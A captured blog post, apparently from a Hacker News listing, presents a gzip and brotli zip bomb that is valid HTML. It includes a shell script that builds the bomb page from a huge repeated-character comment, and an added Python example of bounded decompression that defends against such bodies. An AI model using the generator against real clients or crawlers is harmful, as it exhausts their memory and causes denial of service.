A valid HTML zip bomb

Bogdanp

created: July 24, 2025, 1:16 p.m. | updated: July 24, 2025, 10:17 p.m.

Today, I present a gzip and brotli zip bomb that is valid HTML. With a zip bomb, we attempt to exhaust their RAM. We're exploiting the asymmetry of the resources needed to serve the zip bomb versus those needed to detect it. So, I set myself the challenge of creating a valid HTML page containing a zip bomb.

    # HTML prologue, ending with an opened comment
    echo -n '<!DOCTYPE html><html lang=en><head><meta charset=utf-8><title>Projet: Valid HTML bomb</title><meta name=fediverse:creator content=@[email protected]><link rel=canonical href=https://ache.one/bomb.html><!--'
    # A file holding 258 'H' characters, used as the repeated unit
    echo -n (string repeat --count 258 'H') >/tmp/H_258
    # Fill the comment by concatenating that file many times
    for i in (seq 507)
        cat (yes /tmp/H_258 | head --lines=81925)
    end
    cat (yes /tmp/H_258 | head --lines=81924)
    # Close the comment and emit the body (this line is cut off in the source)
    echo -n "--><body><p>This is a HTML valid bomb, cf.

The interest of having a more varied HTML zip bomb would be to ensure that the HTML parser doesn't optimize the reading of certain parts.
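The receiving side of the asymmetry described above, as an added example that is not part of the original post: a client that inflates a gzip body under a hard output cap instead of buffering whatever it expands to. The names `bounded_gunzip` and `make_sample` and the 1 MB cap are assumptions, the sample body is constructed and only mirrors the page's layout at a few megabytes, and brotli is not covered.

```python
import gzip
import zlib

# Constructed sample: same layout as the page's file (HTML prefix, one long
# comment of 'H', closing markup), scaled down to a few megabytes.
PREFIX = b"<!DOCTYPE html><html lang=en><head><meta charset=utf-8><title>sample</title><!--"
SUFFIX = b"--><body><p>constructed sample</p></body></html>"


class DecompressionLimitExceeded(Exception):
    """The body inflates to more than the caller is willing to buffer."""


def make_sample(repeats=20_000):
    """Return (gzip_bytes, inflated_length) for the constructed page."""
    html = PREFIX + b"H" * (258 * repeats) + SUFFIX
    return gzip.compress(html), len(html)


def bounded_gunzip(data, max_output):
    """Inflate a gzip body, raising as soon as output exceeds max_output bytes."""
    d = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)  # 16 + MAX_WBITS selects gzip framing
    out = bytearray()
    buf = data
    while not d.eof:
        # Ask for at most one byte past the cap: enough to prove the limit is
        # exceeded without ever allocating the full inflated body.
        piece = d.decompress(buf, max_output - len(out) + 1)
        out += piece
        if len(out) > max_output:
            raise DecompressionLimitExceeded(
                f"{len(data)} compressed bytes inflate past the {max_output}-byte cap")
        buf = d.unconsumed_tail  # input zlib has not looked at yet
        if not piece and not buf and not d.eof:
            raise ValueError("truncated gzip stream")
    return bytes(out)


if __name__ == "__main__":
    blob, inflated = make_sample()
    print(f"{len(blob)} bytes on the wire, {inflated} bytes inflated")
    try:
        bounded_gunzip(blob, max_output=1_000_000)
    except DecompressionLimitExceeded as exc:
        print("rejected:", exc)
```

The cap applies to inflated bytes, not to the size on the wire, which is the only figure a Content-Length header would reveal.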

1 week, 3 days ago: Hacker News: Front Page